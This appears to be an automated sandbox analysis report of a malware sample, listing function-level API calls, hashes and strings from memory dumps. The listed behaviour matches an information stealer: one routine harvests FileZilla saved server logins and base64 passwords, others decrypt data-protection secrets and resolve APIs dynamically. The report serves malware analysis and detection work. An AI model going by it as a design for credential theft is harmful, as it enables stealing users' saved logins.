                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptString
                      • String ID:
                      • API String ID: 80407269-0
                      • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                      • Instruction ID: 271f23ab46d6fdb3075a4a8678946bf5a6112af67789b6ad00a457570a324d7d
                      • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                      • Instruction Fuzzy Hash: D611EFB4214204BFDB04CF94DC99FA733A9AF89754F009568F9198B260E775F981DB60
                      APIs
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,04105155,00000000,00000000), ref: 04109D56
                      • LocalAlloc.KERNEL32(00000040,?,?,?,04105155,00000000,?), ref: 04109D68
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,04105155,00000000,00000000), ref: 04109D91
                      • LocalFree.KERNEL32(?,?,?,?,04105155,00000000,?), ref: 04109DA6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptLocalString$AllocFree
                      • String ID:
                      • API String ID: 4291131564-0
                      • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                      • Instruction ID: db32da2466c16268019da9012d41b3a6cc5c1ef1840d39328aff8f9967bd05a6
                      • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                      • Instruction Fuzzy Hash: 211162B4641208EFEB10CFA4C895BAA77A5EB89714F208158FD159B394C7B6A941CB90
                      APIs
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                      • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                      • LocalFree.KERNEL32(?), ref: 00409BD3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                      • String ID:
                      • API String ID: 3243516280-0
                      • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                      • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                      • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                      • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                      APIs
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 04109DEB
                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 04109E0A
                      • memcpy.MSVCRT(?,?,?), ref: 04109E2D
                      • LocalFree.KERNEL32(?), ref: 04109E3A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                      • String ID:
                      • API String ID: 3243516280-0
                      • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                      • Instruction ID: e690adcd0b9af3ae8387c6b921b03e962d47349b176415038db754255debab3b
                      • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                      • Instruction Fuzzy Hash: 74110CB8A00209EFDB04CFA4D989AAE77B5FF89300F108558F91597390D770AE10CF61
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0254CE88,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                      • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,0254CE88,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0254CE88,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                      • wsprintfA.USER32 ref: 00417AB7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                      • String ID:
                      • API String ID: 362916592-0
                      • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                      • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                      • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                      • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                      APIs
                      • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharCreateInstanceMultiWide
                      • String ID:
                      • API String ID: 123533781-0
                      • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                      • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                      • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                      • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: .$GetProcAddress.$l
                      • API String ID: 0-2784972518
                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                      • Instruction ID: b714f783f9c4a783ff9f3f96e097936e2a56aca838577c9a3f5cb40c26774e54
                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                      • Instruction Fuzzy Hash: 263149B6900609DFEB10CF99D880BAEBBF5FF48324F15808AD545A7250D7B1FA45CBA4
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                      • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                      • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                      • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 0411D156
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                      • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                      • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                      • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892368314.000000000251E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0251E000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_251e000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                      • Instruction ID: c4510c5474f9c56e96777eaf733810311b870741138dd1cf61888f9f40718084
                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                      • Instruction Fuzzy Hash: 26118272340201AFE794DF55DC90EA673EAFB88264B198159ED08CB716D675EC42CB60
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                      • Instruction ID: 95234716a90ef523e5d64309de7811f6578fd30dfb860f8ab9c7896643d7ad47
                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                      • Instruction Fuzzy Hash: F701A7767006048FDF21CF24E854BEA37E5EB89215F4584E5E506972C2E7B4B9418B90
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: free
                      • String ID:
                      • API String ID: 1294909896-0
                      • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                      • Instruction ID: 9fb8e07d536b328817f4b9609fb124ce6e835c83eecf046b7b7b18bea23ec248
                      • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                      • Instruction Fuzzy Hash: 1271D531452F40DBEF633B31DD41ECA7EA27F0478AF104934A1DB29D709BA278699B51
                      APIs
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                      • strtok_s.MSVCRT ref: 0041031B
                      • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                      • lstrlenA.KERNEL32(00000000), ref: 00410393
                        • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                        • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                      • lstrlenA.KERNEL32(00000000), ref: 004103DD
                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                      • lstrlenA.KERNEL32(00000000), ref: 00410427
                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                      • lstrlenA.KERNEL32(00000000), ref: 00410475
                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                      • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                      • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                      • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                      • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                      • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                      • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                      • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                      • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                      • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                      • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                      • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                      • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                      • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                      • strtok_s.MSVCRT ref: 00410679
                      • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                      • memset.MSVCRT ref: 004106DD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                      • API String ID: 337689325-514892060
                      • Opcode ID: 1acbabc0d8c6bfc6c0f7b4a82fa7396942886258aa1e80f318e05fd0164ae73b
                      • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                      • Opcode Fuzzy Hash: 1acbabc0d8c6bfc6c0f7b4a82fa7396942886258aa1e80f318e05fd0164ae73b
                      • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                      APIs
                      • lstrlen.KERNEL32(00424D98), ref: 04104833
                      • lstrlen.KERNEL32(00424E48), ref: 0410483E
                      • lstrlen.KERNEL32(00424F10), ref: 04104849
                      • lstrlen.KERNEL32(00424FC8), ref: 04104854
                      • lstrlen.KERNEL32(00425070), ref: 0410485F
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0410486E
                      • RtlAllocateHeap.NTDLL(00000000), ref: 04104875
                      • lstrlen.KERNEL32(00425118), ref: 04104883
                      • lstrlen.KERNEL32(004251C0), ref: 0410488E
                      • lstrlen.KERNEL32(00425268), ref: 04104899
                      • lstrlen.KERNEL32(00425310), ref: 041048A4
                      • lstrlen.KERNEL32(004253B8), ref: 041048AF
                      • lstrlen.KERNEL32(00425460), ref: 041048C3
                      • lstrlen.KERNEL32(00425508), ref: 041048CE
                      • lstrlen.KERNEL32(004255B0), ref: 041048D9
                      • lstrlen.KERNEL32(00425658), ref: 041048E4
                      • lstrlen.KERNEL32(00425700), ref: 041048EF
                      • lstrlen.KERNEL32(004257A8), ref: 04104918
                      • lstrlen.KERNEL32(00425850), ref: 04104923
                      • lstrlen.KERNEL32(00425918), ref: 0410492E
                      • lstrlen.KERNEL32(004259C0), ref: 04104939
                      • lstrlen.KERNEL32(00425A68), ref: 04104944
                      • strlen.MSVCRT ref: 04104957
                      • lstrlen.KERNEL32(00425B10), ref: 0410497F
                      • lstrlen.KERNEL32(00425BB8), ref: 0410498A
                      • lstrlen.KERNEL32(00425C60), ref: 04104995
                      • lstrlen.KERNEL32(00425D08), ref: 041049A0
                      • lstrlen.KERNEL32(00425DB0), ref: 041049AB
                      • lstrlen.KERNEL32(00425E58), ref: 041049BB
                      • lstrlen.KERNEL32(00425F00), ref: 041049C6
                      • lstrlen.KERNEL32(00425FA8), ref: 041049D1
                      • lstrlen.KERNEL32(00426050), ref: 041049DC
                      • lstrlen.KERNEL32(004260F8), ref: 041049E7
                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 04104A03
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                      • String ID:
                      • API String ID: 2127927946-0
                      • Opcode ID: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                      • Instruction ID: 86c78d24730b52b232f3ac03a5ee3d598f919a199d27b34a924e915c150104a9
                      • Opcode Fuzzy Hash: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                      • Instruction Fuzzy Hash: 0C419979740624EBC718AFE5EC89B987F71AB4C712BA0C066F9029A190C7F5D5019B3E
                      APIs
                      • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 04119B08
                      • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 04119B21
                      • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 04119B39
                      • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 04119B51
                      • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 04119B6A
                      • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 04119B82
                      • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 04119B9A
                      • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 04119BB3
                      • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 04119BCB
                      • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 04119BE3
                      • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 04119BFC
                      • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 04119C14
                      • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 04119C2C
                      • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 04119C45
                      • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 04119C5D
                      • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 04119C75
                      • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 04119C8E
                      • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 04119CA6
                      • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 04119CBE
                      • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 04119CD7
                      • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 04119CEF
                      • LoadLibraryA.KERNEL32(0064A550,?,04116C67), ref: 04119D01
                      • LoadLibraryA.KERNEL32(0064A17C,?,04116C67), ref: 04119D12
                      • LoadLibraryA.KERNEL32(0064A104,?,04116C67), ref: 04119D24
                      • LoadLibraryA.KERNEL32(0064A1DC,?,04116C67), ref: 04119D36
                      • LoadLibraryA.KERNEL32(0064A328,?,04116C67), ref: 04119D47
                      • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 04119D69
                      • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 04119D8A
                      • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 04119DA2
                      • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 04119DC4
                      • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 04119DE5
                      • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 04119E06
                      • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 04119E1D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID:
                      • API String ID: 2238633743-0
                      • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                      • Instruction ID: 874ccc149d66a051344b55121a11627e12828319ced59bc52b43f24c94f82d00
                      • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                      • Instruction Fuzzy Hash: A4A13CBD5D0240BFE354EFE8ED889963BFBF74E201714661AE605C3264D739A441DB12
                      APIs
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                        • Part of subcall function 04119047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 04119072
                        • Part of subcall function 0411AB87: lstrcpy.KERNEL32(00000000,?), ref: 0411ABD9
                        • Part of subcall function 0411AB87: lstrcat.KERNEL32(00000000), ref: 0411ABE9
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                        • Part of subcall function 0411AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0411AC2C
                        • Part of subcall function 0411AC17: lstrcpy.KERNEL32(00000000), ref: 0411AC6B
                        • Part of subcall function 0411AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0411AC79
                        • Part of subcall function 0411AA07: lstrcpy.KERNEL32(?,00000000), ref: 0411AA4D
                        • Part of subcall function 04109C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 04109C53
                        • Part of subcall function 04109C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 04109C78
                        • Part of subcall function 04109C27: LocalAlloc.KERNEL32(00000040,?), ref: 04109C98
                        • Part of subcall function 04109C27: ReadFile.KERNEL32(000000FF,?,00000000,041016F6,00000000), ref: 04109CC1
                        • Part of subcall function 04109C27: LocalFree.KERNEL32(041016F6), ref: 04109CF7
                        • Part of subcall function 04109C27: CloseHandle.KERNEL32(000000FF), ref: 04109D01
